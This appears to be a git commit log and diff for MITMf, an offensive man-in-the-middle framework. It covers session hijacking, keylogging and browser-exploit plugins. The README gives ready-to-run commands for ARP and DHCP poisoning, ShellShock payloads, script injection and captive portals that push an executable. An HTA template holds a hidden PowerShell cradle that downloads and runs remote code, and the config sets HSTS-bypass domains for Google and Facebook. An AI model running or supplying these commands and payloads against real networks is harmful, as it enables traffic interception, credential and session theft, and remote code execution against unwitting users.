Ferret-NG plugin is pretty much set also, was a bit of a dummy and didn't take into account that we would have sessions from multiple clients (duh!), so I added a section in the config file to specify the client to hijack the sessions from, also added an option to load the cookies from a log file!
2015-05-16 21:22:11 +02:00
byt3bl33d3r
ff39a302f9 This commit is just to push the changes so far to github, still have to tidy things up here and there and fix some bugs (also I really hate javascript)
JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits), it's been completely re-written along with its config file section
Addition of the screenshotter plugin, currently there is a bug when decoding the base64 encoded png files (a very weird one), but other than that it works (did i mention i hate js?)
Jskeylogger's javascript now works on every browser except FF mobile (have no clue what's with that) p.s. did i mention i hate JS?
Plugins that deal with javascript now read it from a file as opposed to having it built in (encoding issues) fu javascript
User agent parsing is now built in and handled by core/httpagentparser.py, this is because the user-agent library is a pain to install on some distros, also removes 3-4 deps which is a plus

also fuck javascript
2015-05-16 00:43:56 +02:00
byt3bl33d3r
86870b8b72 markdown 2015-05-11 04:26:37 +02:00
byt3bl33d3r
acf8a78545 Readme tidying 2015-05-11 04:16:52 +02:00
byt3bl33d3r
de1cf6f9d6 typos 2015-05-11 04:03:12 +02:00
byt3bl33d3r
aefd0cea3b Updated Readme 2015-05-11 03:58:52 +02:00
byt3bl33d3r
79025dc77e Initial working PoC for the Ferret-NG plugin that will replace the SessionHijacker plugin: it will capture cookies and transparently feed them to the proxy it starts up on port 10010 (by default), this way we just have to connect to the proxy, browse to the same website as the victim and we will automatically hijack their session! \o/
The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework releases and never removed.

Replace plugin has been given its own section in the config file

currently the BeefAutorun and Javapwn plugins have to be cleaned up...

BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version

Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too, as opposed to only Java exploits

Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin

Tweaked the output of some plugins
2015-05-11 03:13:45 +02:00
byt3bl33d3r
d3e509d4cd Added error handling to DNS and SMB servers when port is in use
Added a check to see if a plugin's options were called without loading the actual plugin
2015-05-06 23:07:59 +02:00
byt3bl33d3r
70ec5a2bbc All plugins are now modified to support dynamic config file changes
Responder functionality fully restored
2015-05-05 19:04:01 +02:00
byt3bl33d3r
dfa9c9d65e Added debug logging to ProxyPlugins, it will now print a traceback if errors occur in hooked functions 2015-05-05 00:39:59 +02:00
byt3bl33d3r
5d07551a50 WPAD Poisoner back online, removed the options in the config file and related code for choosing which DNS server to use (there really was no point in keeping it)
the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them.
Modified and re-added the JS-keylogger and SMBauth plugins
2015-05-04 23:13:21 +02:00
byt3bl33d3r
aa4e022ab0 Kerberos server back online, squashed some bugs 2015-04-30 00:10:55 +02:00
byt3bl33d3r
6b421d1cac typo 2015-04-28 13:10:36 +02:00
byt3bl33d3r
2c6e9a31b7 modded readme 2015-04-28 13:08:56 +02:00
byt3bl33d3r
08b9029a96 Responder's MDNS/LLMNR/NBTNS poisoners are back in action (better than ever), only WPAD remains.
Tested against Windows 7 and 8, got hashes 100% of the time! \o/

The rest of the servers will be added in after WPAD is fixed.

Next step is to fix the logging... frankly I'd rather just log everything into the main mitmf.log file since it's very grep'able.
Also the exact output is going to need tweaking, the lines are way too long
2015-04-28 02:03:12 +02:00
byt3bl33d3r
7aad9879d1 version bump in readme 2015-04-27 19:19:34 +02:00
byt3bl33d3r
9712eed4a3 This is 1/2 of the work done... lots of cool stuff!
I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds.

- Net-creds is now started by default and is no longer a plugin... It's all about getting those creds after all.
- Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code)
- The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) (a parsing sketch follows this commit)
- An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as opposed to the one built into Responder, mainly for a few reasons:
  1) Impacket is moving towards SMB2 support and is actively developed
  2) Impacket's SMB server is fully functional as opposed to Responder's (will be adding a section for it in the config file)
  3) Responder's SMB server was unreliable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out)

- Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!)
- Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable.
- POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is of no use)
- Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out)
- Some plugins are missing because I'm currently re-writing them, will be added later
- Main plugin class now inherits from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
2015-04-27 18:33:55 +02:00
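A standalone sketch of expanding the --target syntax mentioned in the commit above (dash ranges and comma lists, plus the CIDR form used in the README examples) with the stdlib ipaddress module; it is not MITMf's actual parser.

```python
from ipaddress import ip_address, ip_network

def expand_targets(spec):
    """Expand e.g. '10.10.10.1-15,192.168.0.0/24' into a flat list of IPs."""
    targets = []
    for part in spec.split(","):
        part = part.strip()
        if "/" in part:                                   # CIDR notation
            targets.extend(str(h) for h in ip_network(part, strict=False).hosts())
        elif "-" in part:                                 # dash range in the last octet
            start, end = part.split("-")
            base, first = start.rsplit(".", 1)
            targets.extend("{}.{}".format(base, i) for i in range(int(first), int(end) + 1))
        else:                                             # single host
            targets.append(str(ip_address(part)))
    return targets

print(len(expand_targets("10.10.10.1-15,192.168.0.0/24")))  # 15 + 254 = 269 hosts
```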
byt3bl33d3r
71ea8e6046 Update README.md 2015-04-21 17:39:27 +02:00
byt3bl33d3r
42892bbfc5 Merge pull request #67 from secretsquirrel/patch-1
Just a Typo Update
2015-04-20 09:42:08 +02:00
secret squirrel
fddfe7c306 Just a Typo Update 2015-04-19 23:38:13 -04:00
byt3bl33d3r
f2466c822a fixed typo as noticed in #66 2015-04-19 23:37:01 +02:00
byt3bl33d3r
663f38e732 initial dynamic config support
added configwatcher.py
2015-04-19 23:33:44 +02:00
byt3bl33d3r
96eb4e2fa6 added capstone in requirements.txt
modified setup and update scripts
2015-04-18 15:08:11 +02:00
byt3bl33d3r
a766c685b1 also added pyopenssl and service_identity to requirements.txt 2015-04-18 14:31:38 +02:00
byt3bl33d3r
eebd7e1978 added ipy to requirements.txt as noticed in #65 2015-04-18 14:13:58 +02:00
byt3bl33d3r
33c9eda05b fixed the responder plugin (im a dummy) 2015-04-17 02:11:00 +02:00
byt3bl33d3r
88a4e15900 fixed some output 2015-04-16 01:38:28 +02:00
byt3bl33d3r
6121c67eaa Merge branch 'dev' 2015-04-15 18:25:59 +02:00
byt3bl33d3r
b91bb4271b - Fixed bug where sometimes DNS wouldn't resolve local IP's
- Added Metasploit integration to Filepwn plugin
2015-04-15 18:19:19 +02:00
byt3bl33d3r
360a6ba6ce addresses issue #63 2015-04-15 17:16:28 +02:00
byt3bl33d3r
3421c5af55 Update requirements.txt with missing dependency 2015-04-15 16:39:05 +02:00
byt3bl33d3r
be19a685b3 Update README.md 2015-04-15 16:12:08 +02:00
byt3bl33d3r
8eb09309d2 Merged Filepwn plugin and config file changes 2015-04-15 00:40:01 +02:00
byt3bl33d3r
460399541f Modded Responder plugin to accommodate re-write
Started converting all string formatting to format() API
2015-04-13 20:25:14 +02:00
128 changed files with 16026 additions and 9389 deletions

8
.coveragerc Normal file

@@ -0,0 +1,8 @@
[run]
branch = True
[report]
include = *core*, *libs*, *plugins*
exclude_lines =
    pragma: nocover
    pragma: no cover

62
.gitignore vendored

@@ -1,3 +1,63 @@
*.pyc
/plugins/old_plugins/
backdoored/
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# OSX Stuff
.DS_Store
._.DS_Store

9
.gitmodules vendored

@@ -1,12 +1,3 @@
[submodule "libs/bdfactory"]
path = libs/bdfactory
url = https://github.com/secretsquirrel/the-backdoor-factory
[submodule "libs/responder"]
path = libs/responder
url = https://github.com/byt3bl33d3r/Responder-MITMf
[submodule "core/beefapi"]
path = core/beefapi
url = https://github.com/byt3bl33d3r/beefapi
[submodule "libs/dnschef"]
path = libs/dnschef
url = https://github.com/byt3bl33d3r/dnschef

27
.travis.yml Normal file

@@ -0,0 +1,27 @@
language: python
python:
  - "2.7"
addons:
  apt:
    packages:
      - libpcap0.8-dev
      - libnetfilter-queue-dev
      - libssl-dev
notifications:
  irc:
    channels:
      - "irc.freenode.org#MITMf"
    template:
      - "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
    skip_join: true
    use_notice: true
install: "pip install -r requirements.txt"
before_script:
  - "pip install python-coveralls"
script:
  - "nosetests --with-cov"
after_success:
  - coveralls

47
CHANGELOG.md Normal file

@@ -0,0 +1,47 @@
- Added active filtering/injection into the framework
- Fixed a bug in the DHCP poisoner which prevented it from working on windows OS's
- Made some performance improvements to the ARP spoofing poisoner
- Refactored Appcachepoison and BrowserSniper plugins
- Refactored proxy plugin API
- Inject plugin now uses BeautifulSoup4 to parse and inject HTML/JS
- Added HTA Drive by plugin
- Added the SMBTrap plugin
- Config file now updates on the fly!
- SessionHijacker has been replaced with Ferret-NG, which captures cookies and starts a proxy that will feed them to connected clients
- JavaPwn plugin has been replaced with BrowserSniper, which now supports Java, Flash and browser exploits
- Addition of the Screenshotter plugin, able to render screenshots of a client's browser at regular intervals
- Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now an IPv4/IPv6 (TCP & UDP) DNS server! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
- Integrated [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS and act as a rogue WPAD server
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing
- Spoof plugin now supports ICMP, ARP and DHCP spoofing
- Usage of third party tools has been completely removed (e.g. Ettercap)
- FilePwn plugin re-written to backdoor executables zip and tar files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploit's RPC server
- Added [beefapi.py](https://github.com/byt3bl33d3r/beefapi) for interfacing with BeEF's RESTfulAPI
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here: http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)

52
CONTRIBUTING.md Normal file

@@ -0,0 +1,52 @@
Contributing
============
Hi! Thanks for taking the time and contributing to MITMf! Pull requests are always welcome!
Submitting Issues/Bug Reporting
=============
Bug reporting is an essential part of any project since it lets people know what's broken!
Before reading on, here's a list of cases where you **shouldn't** be reporting the bug:
- If you haven't installed MITMf using the method described in the [installation](https://github.com/byt3bl33d3r/MITMf/wiki/Installation) instructions. (your fault!)
- If you're using an old version of the framework (and by old I mean anything else that **isn't** the current version on Github)
- If you found a bug in a packaged version of MITMf (e.g. Kali Repos), please file a bug report with the distro's maintainer
Lately, there has been a sharp **increase** in the volume of bug reports, so in order for me to make any sense out of them and to quickly identify, reproduce and push a fix I do expect a minimal amount of cooperation from the reporter!
Writing the report
==================
**Before submitting a bug familiarize yourself with [Github markdown](https://help.github.com/articles/github-flavored-markdown/) and use it in your report!**
After that, open an issue ticket and please describe the bug in **detail!** MITMf has a lot of moving parts so the more detail the better!
Include in the report:
- The full command string you used
- The full output of: ```pip freeze```
- The full output of MITMf in debug mode (append ```--log debug``` to the command you used)
- The OS you're using (distribution and architecture)
- The full error traceback (If any)
- If the bug resides in the way MITMf sends/receives packets, include a link to a pcap containing a full packet capture
Some good & bad examples
=========================
- How to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/71
https://github.com/byt3bl33d3r/MITMf/issues/70
https://github.com/byt3bl33d3r/MITMf/issues/64
- How not to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/35 <-- My personal favorite
https://github.com/byt3bl33d3r/MITMf/issues/139
https://github.com/byt3bl33d3r/MITMf/issues/138
https://github.com/byt3bl33d3r/MITMf/issues/128
https://github.com/byt3bl33d3r/MITMf/issues/52

22
CONTRIBUTORS.md Normal file

@@ -0,0 +1,22 @@
# Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
- @xtr4nge
- @DrDinosaur
- @secretsquirrel
- @binkybear
- @0x27
- @golind
- @mmetince
- @niallmerrigan
- @auraltension
- @HAMIDx9
# Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
- The Backdoor Factory and BDFProxy
- ARPWatch module from the Subterfuge Framework
- Impacket's KarmaSMB script

195
README.md Normal file → Executable file

@@ -1,84 +1,171 @@
MITMf V0.9.6
============
![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
![Latest Version](https://img.shields.io/badge/mitmf-0.9.8%20--%20The%20Dark%20Side-red.svg)
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
# MITMf
Framework for Man-In-The-Middle attacks
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
**Before submitting issues please read the appropriate [section](#submitting-issues).**
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
- Email: byt3bl33d3r@protonmail.com
(Another) Dependency change!
============================
As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required.
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
Installation
============
If MITMf is not in your distros repo or you just want the latest version:
- clone this repository
- run the ```setup.sh``` script
- run the command ```pip install -r requirements.txt``` to install all python dependencies
Availible plugins
=================
- Responder - LLMNR, NBT-NS and MDNS poisoner
- SSLstrip+ - Partially bypass HSTS
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
- Sniffer - Sniffs for various protocol login and auth attempts
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
- AppCachePoison - Perform app cache poison attacks
- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile
- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
- CacheKill - Kills page caching by modifying headers
- FilePwn - Backdoor executables being sent over http using bdfactory
- Inject - Inject arbitrary content into HTML content
- JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins
- jskeylogger - Injects a javascript keylogger into clients webpages
- Replace - Replace arbitary content in HTML content
- SMBAuth - Evoke SMB challenge-response auth attempts
- Upsidedownternet - Flips images 180 degrees
Please refer to the wiki for [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)
Changelog
=========
Description
============
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving
existing attacks and techniques.
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server ! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely
re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
- Addition of the Sniffer plugin which integrates [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are:
FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
Features
========
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server.
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
allowing users to modify any type of traffic or protocol.
- Addition of the SessionHijacking plugin, which uses code from [FireLamb](https://github.com/sensepost/mana/tree/master/firelamb) to store cookies in a Firefox profile
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing!
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
- Spoof plugin now supports ICMP, ARP and DHCP spoofing
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
- Usage of third party tools has been completely removed (e.g. ettercap)
Active packet filtering/modification
====================================
- FilePwn plugin re-written to backdoor executables and zip files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploits rpc server
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
- Added [beefapi.py](https://github.com/byt3bl33d3r/beefapi) for interfacing with BeEF's RESTfulAPI
```python
if packet.haslayer(ICMP):
    log.info('Got an ICMP packet!')
    packet.dst = '192.168.1.0'
```
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)
- Use the ```packet``` variable to access the packet in a Scapy compatible format
- Use the ```data``` variable to access the raw packet data
Submitting Issues
=================
If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com
Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
If you find a *bug* please open an issue and include at least the following in the description:
You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
- Full command string you used
- OS your using
**Note**: you can modify filters on-the-fly without restarting MITMf!
Also remember: Github markdown is your friend!
Examples
========
How to install on Kali
======================
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
```python mitmf.py -i enp3s0```
ARP poison the whole subnet with the gateway at 192.168.1.1 using the **Spoof** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1```
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad```
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1```
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
Enable LLMNR/NBTNS/MDNS spoofing:
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dhcp```
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
Inject an HTML IFrame using the **Inject** plugin:
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
Start a captive portal that redirects everything to http://SERVER/PATH:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
Same as above but with hostname:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
# Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
- **ScreenShotter** : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- **Responder** : LLMNR, NBT-NS, WPAD and MDNS poisoner
- **SSLstrip+** : Partially bypass HSTS
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees
- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
# How to fund my tea & sushi reserve
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr
```apt-get install mitmf```


@@ -34,5 +34,5 @@
</div>
<div style="padding: 1em;border:1px solid red;margin:1em">
<h1>AppCache Poison works!</h1>
<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
<p>This page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
</div>


@@ -1,2 +1,2 @@
;console.log('AppCache Poison was here. Google Analytics FTW');
;alert('AppCache Poison was here. Google Analytics FTW');

31
config/captive/portal.html Executable file

@@ -0,0 +1,31 @@
<html>
<head>
<title>Captive Portal</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>Client Required</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="CaptiveClient.exe"><b>Captive Portal Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Captive Server</b></div>
</center>
</body>
</html>


@@ -0,0 +1,4 @@
<script>
var c = "powershell.exe -w hidden -nop -ep bypass -c \"\"IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:3000/ps/ps.png')); Invoke-ps\"\"";
new ActiveXObject('WScript.Shell').Run(c);
</script>

475
config/mitmf.conf Normal file → Executable file

@@ -1,46 +1,44 @@
#
#MITMf configuration file
# MITMf configuration file
#
[MITMf]
#
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run `python mitmf.py`
#(assuming you config file is in the default directory)
#
args=''
#Required BeEF and Metasploit options
# Required BeEF and Metasploit options
[[BeEF]]
beefip = 127.0.0.1
beefport = 3000
host = 127.0.0.1
port = 3000
user = beef
pass = beef
[[Metasploit]]
msfport = 8080 #Port to start webserver for exploits
rpcip = 127.0.0.1
rpcport = 55552
rpcpass = abc123
[[MITMf-API]]
host = 127.0.0.1
port = 9999
[[DNS]]
#
#Here you can configure MITMf's internal DNS server
# Here you can configure MITMf's internal DNS server
#
resolver = dnschef #Can be set to 'twisted' or 'dnschef' ('dnschef' is highly reccomended)
tcp = Off #Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 #Port to listen on
ipv6 = Off #Run in IPv6 mode (not fully tested, might break stuff!)
tcp = Off # Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 # Port to listen on
ipv6 = Off # Run in IPv6 mode (not fully tested, might break stuff!)
#
#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
#can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
# can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.0.2.1
*.thesprawl.org=192.168.178.27
*.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
@@ -76,105 +74,110 @@
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=
#
#Plugin configuration starts here
# Plugin configuration starts here
#
[Captive]
[Spoof]
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
Port = 8080
ServerString = "Captive Server 1.0"
[[DHCP]]
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
# Set the filename served as /CaptivePortal.exe by integrated http server
PayloadFilename = config/captive/calc.exe
[Replace]
[[Regex1]]
'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
[Ferret-NG]
#
# Here you can specify the client to hijack sessions from
#
Client = '10.0.237.91'
[SSLstrip+]
#
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
#
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
##Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
#Servers to start
SQL = On
HTTPS = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
LDAP = On
